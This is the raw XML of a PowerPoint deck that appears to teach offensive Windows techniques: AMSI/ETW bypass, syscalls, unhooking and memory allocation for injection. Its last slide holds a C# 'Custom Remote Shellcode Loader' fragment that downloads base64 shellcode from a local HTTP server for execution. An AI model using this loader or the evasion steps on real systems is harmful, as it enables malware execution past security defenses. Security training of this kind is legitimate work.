      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FFB1DE3-1209-D980-D353-A1D5A0A645E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2F412BB-0163-750C-254A-87FAD45D8AEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D7618173-21CC-E341-A310-66C283A5EB36}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1713519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599946-229F-1042-4D9D-B75C50B61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7D2AE09-E8D1-2EF6-E696-652C28CC28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33A55301-2004-0FE3-F7C6-AF0C0DA18E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58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
              <a:t>17/05/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148DB58D-72D2-D51E-8AEF-65D32D6E34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BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB80E2A-65AC-0ACD-DC0B-D4AB6C99DD3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618173-21CC-E341-A310-66C283A5EB36}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20053197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2189E8-FB4B-A77C-87C1-F46DA2D7096E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841157" y="976184"/>
            <a:ext cx="10234853" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>AI, Shellcode, customize attack framework, bypass, AMSI, ETW, Syscalls, shellcode loader, unhooking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>euristics…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3130006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D12E8-6AEC-5CC3-4D9D-7BACEA760240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>MSDN Functions needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80D64076-69EF-069F-FEDE-E0BAF0C69A15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>P/INVOKE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>D/INVOKE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38315096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51D8D0A-CCF7-963D-3C76-A1FA23D22718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="126316" y="111211"/>
            <a:ext cx="12139472" cy="6746789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0DBDC2B-6DF6-E6D6-502B-5BB962F613E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1828800" y="518984"/>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Frame 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AEB1170-3BBB-E625-831B-7A79BFF6FFA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588936" y="883404"/>
            <a:ext cx="1889088"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0" name="Frame 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{252CD377-9B86-133F-3E92-8F6DE1647AB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="884256" y="1335543"/>
            <a:ext cx="94454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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Frame 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A5297B0-00BD-7D72-BC40-4ECAAD8B5161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070352" y="3566056"/>
            <a:ext cx="1343664" cy="193728"/>
          </a:xfrm>
          <a:prstGeom prst="frame">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FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A88D0017-A38F-99BB-762D-A5F8C2EE8F54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2478024" y="3661472"/>
            <a:ext cx="2123090" cy="0"/>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4" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{063D3334-6B6E-ED2C-BF71-A5A85BDD4D50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4601114" y="3522972"/>
            <a:ext cx="1511055" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Entrypoint (method)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C270F10-5485-D545-D676-D152016BE2BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3951890" y="380484"/>
            <a:ext cx="6060633" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>milar to libraries/header files -&gt; Compiler to use system namespace (dotnet framework)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15B9C16E-3723-1C21-6AF6-7327AC2E3A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3951890" y="1160364"/>
            <a:ext cx="3902094" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Function declarations</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P/Invoke to load unmanaged code (C# is managed code)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows API written in C and C++</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B68C1AD8-14A1-AF9D-5756-DA57F82B38ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3223381" y="1474042"/>
            <a:ext cx="728509" cy="4545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 name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C35F815-A402-1012-F96A-64F01D430E03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="3" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3302493" y="1483530"/>
            <a:ext cx="649397" cy="109587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80EBF36-B57E-36CA-2B9B-A04B0231AEE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="3" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3602887" y="1483530"/>
            <a:ext cx="349003" cy="1638387"/>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B14D11D2-FF1C-27A6-049C-2BD6F5B82273}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2684238" y="906448"/>
            <a:ext cx="1472134" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unmanaged DLL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D6C28F0-5B53-8726-E04E-0CD5E1B49815}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2384460" y="1234038"/>
            <a:ext cx="838921" cy="367013"/>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7" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA24DFBF-E173-88A1-AC06-52F0D38ED746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8753382" y="1839540"/>
            <a:ext cx="3097643" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Return starting address of the memory code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will be injected into,</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6068BAF3-5E0A-E793-86EF-7B5EC93CFC17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7403747" y="3033185"/>
            <a:ext cx="4314832" cy="1546418"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71650349-9EC3-E010-D6A9-A210E5CB93CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2607942" y="3644918"/>
            <a:ext cx="4817390" cy="1201515"/>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8" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77B80DCA-8F22-064C-5755-6DB46D3D53DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7428461" y="4515606"/>
            <a:ext cx="4300633" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34465643-5CD2-7ECD-E088-03826B9644C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7513665" y="5033264"/>
            <a:ext cx="4215429" cy="1545657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8942583E-8AE1-31AD-38C2-5C79DD885334}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3777388" y="4838194"/>
            <a:ext cx="3733148" cy="1457686"/>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84124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85F3B-E7B5-8FE5-726B-1F26BC1AC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CE74C6-9914-0C5E-9F3E-92A8E398A81F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Custom Remote Shellcode Loader</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F48E7CC6-DE1A-7880-1678-F3D2445E6658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>ownload shellcode remotely into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>getConsoleWindow</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payloadUrl = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"http://192.168.85.149:8000/payload.txt"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[] shellCode;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (WebClient client = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> WebClient()) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> payloadBase64 = client.DownloadString(payloadUrl);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shellCode = Convert.FromBase64String(payloadBase64);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
